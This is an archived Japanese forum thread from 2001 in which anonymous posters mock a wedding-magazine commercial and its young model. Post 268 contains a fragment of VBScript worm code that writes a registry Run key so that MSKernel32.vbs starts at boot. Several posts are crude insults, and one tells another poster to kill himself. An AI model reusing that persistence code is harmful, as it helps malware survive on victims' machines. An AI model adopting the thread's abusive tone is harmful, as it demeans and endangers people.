ちっとも面白くないな。

236 :提供:名無しさん:01/09/29 00:57
はじまったよ
ワンパターン(w

237 :提供:名無しさん:01/09/29 00:59
どうでもいいや。

238 :提供:名無しさん:01/09/29 01:01
>>234
ガンバレよ、キティ。

239 :提供:名無しさん:01/09/29 01:12
ちっとも面白くないな。
どうでもいいや。

240 :提供:名無しさん:01/09/29 01:48
十四才か、、、ちょっと衝撃入りました。

241 :ねえねえ:01/09/29 01:51
ここまで荒れてる理由って何?(ワラ
何か、すごい面白いよあんたら。

242 :提供:名無しさん:01/09/29 01:53
あの女ゴリラ入ってるよね。

243 :提供:名無しさん:01/09/29 01:53
眉毛ぼーーーーーーーーん

244 :提供:名無しさん:01/09/29 01:58
アンチ1人と煽りが4人くらい?

245 :提供:名無しさん:01/09/29 02:02
>>244
アンチ4人と煽りが1人の間違いじゃないのか?

246 :提供:名無しさん:01/09/29 02:10
いや、自作自演が2人だろう。

247 :提供:名無しさん:01/09/29 02:20
いいね〜、粘着アンチがいると
スレが伸びる伸びる

248 :提供:名無しさん:01/09/29 02:37
たかが結婚雑誌のCMになんでここまで熱くなれるんだ?
まあ熱くなってるのは一部の逝き遅れだろうが(ワラ

249 :提供:名無しさん:01/09/29 02:41
まだやってたのかココ、引っぱりすぎ。

250 :提供:名無しさん:01/09/29 02:41
アップには耐えられない顔だな。

最低5メートル引いて欲しい。

251 :提供:名無しさん:01/09/29 02:46
>>250
大抵の人間の顔はアップには耐えられないと思うが?
あの子はアップでもかなりかわいい方だと思うぞ。

252 :提供:名無しさん:01/09/29 02:53
ハァ?

253 :提供:名無しさん:01/09/29 02:55
>>252
よーするに君みたいに異性に相手にされない不細工より遥かにかわいいってことだよ(ぷぷぷ

254 :提供:名無しさん:01/09/29 02:56
>>251
あの人って一応芸能人だよね

255 :提供:名無しさん:01/09/29 02:58
>>254
一応ね、一応。

256 :提供:名無しさん:01/09/29 03:02
素人と比べられるようじゃオシマイだな。

257 :ヴァヴァアうざいよ・・・:01/09/29 03:03
だから人の顔の事とやかく言えた義理かっての!!
実際目の前で見たらまじ可愛いって!イキオクレ
口臭臭いヴァヴァアどもが!!

258 :提供:名無しさん:01/09/29 03:08
ブスはCM出すなって言ってるだけだろ

259 :提供:名無しさん:01/09/29 03:13
芸能人は顔が命

260 :提供:名無しさん:01/09/29 03:25
第三者から言わせてもらうと、モデルはブスでも美人でもないと思う。
普通に可愛いと言った所。
ただ、既婚未婚関係なく、あのCMの押し付ける様な不快さだけは
絶対に頂けないよ。

261 :提供:名無しさん:01/09/29 03:32
本当にコイツのファンはキモイな。
お前らモー娘。の石川とか好き?
キモさが石川ヲタとかぶるのだが、あと安西ひろこヲタ。

262 :提供:名無しさん:01/09/29 03:57
ちんぽ。

263 :提供:名無しさん:01/09/29 04:20
↑負け犬

264 :提供:名無しさん:01/09/29 13:43
なんかこのスレ伸びがいいね…

265 :提供:名無しさん:01/09/29 13:53
>実際目の前で見たらまじ可愛いって!
さぁ、妄想が始まってしまいました。
短絡的でいかにも厨房って感じがいいですよね(プ

266 :提供:名無しさん:01/09/29 13:58
でもやっぱかわいいよ。好みの問題だと思います。

267 :提供:名無しさん:01/09/29 14:18
俺はお前達が好きだ

268 :世界中がI Love You:01/09/29 14:53

"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-
^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-
@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"

269 :age:01/09/29 14:55
あれは、俺の妻なんスけど・・・・。ショック

270 :提供:名無しさん:01/09/29 15:29
自殺すればいいじゃん

271 :提供:名無しさん:01/09/29 15:45
14歳を妻にしちゃ駄目だよ。

272 :提供:名無しさん:01/09/29 23:31
ヴァカばっかり

273 :提供:名無しさん:01/09/29 23:51
まじムカツクナこのしーえむ。
まじムカツクナこのしーえむ。
まじムカツクナこのしーえむ。
まじムカツクナこのしーえむ。
まじムカツクナこのしーえむ。

274 :提供:名無しさん:01/09/30 00:08
ヴァカばっかりんご

275 :提供:名無しさん:01/09/30 01:12
>267
ワラタYO〜

276 :提供:名無しさん:01/09/30 12:58
このスレもやっと落ち着いたか

277 :提供:名無しさん:01/09/30 16:23
さげ

278 :提供:名無しさん:01/10/01 06:30
じゃぁ、あげ

279 :名無しさん:01/10/01 06:36
体毛の濃い松本ちえ子かと思った。

280 :提供:名無しさん:01/10/01 06:56

┌─────────┐
│            │
│糞スレ認定でました│
│            │   ∧ ∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
└―――──――――┘\\( ゚Д゚ ) < ディーキュウエヌ?。

281 :age:01/10/01 19:40
あげ

282 :提供:名無しさん:01/10/01 23:27
1,2年前のかわいかった頃のエンクミかと思った。

283 :1:01/10/05 05:12
新バージョン出たね。けっこういいかも。
結婚すればイイジャンのナレーションは蛇足。

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)